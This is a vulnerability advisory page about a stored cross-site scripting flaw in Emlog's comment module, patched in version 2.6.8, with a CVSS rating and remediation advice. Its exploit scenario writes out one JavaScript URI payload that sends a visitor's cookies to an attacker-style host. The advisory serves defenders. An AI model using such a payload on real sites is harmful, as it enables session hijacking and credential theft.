Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Emlog is an open source website building system. Prior to version 2.6.8, there is a stored cross-site scripting (XSS) vulnerability in emlog comment module via URI scheme validation bypass. This issue has been patched in version 2.6.8.
AnalysisAI
Stored cross-site scripting (XSS) in Emlog's comment module allows unauthenticated remote attackers to inject malicious scripts via URI scheme validation bypass, affecting all versions prior to 2.6.8. The vulnerability requires user interaction (clicking a malicious link) and can result in session hijacking, credential theft, or malware distribution to website visitors. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Vulnerability AssessmentAI
| Risk Assessment | This vulnerability presents moderate real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker crafts a comment containing a malicious URI payload such as 'javascript:fetch("https://attacker.com/steal?cookie="+document.cookie)' and submits it to an Emlog blog. The comment passes validation (due to the URI scheme bypass) and is stored in the database. … |
| Remediation | Vendor-released patch: Upgrade Emlog to version 2.6.8 or later immediately. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today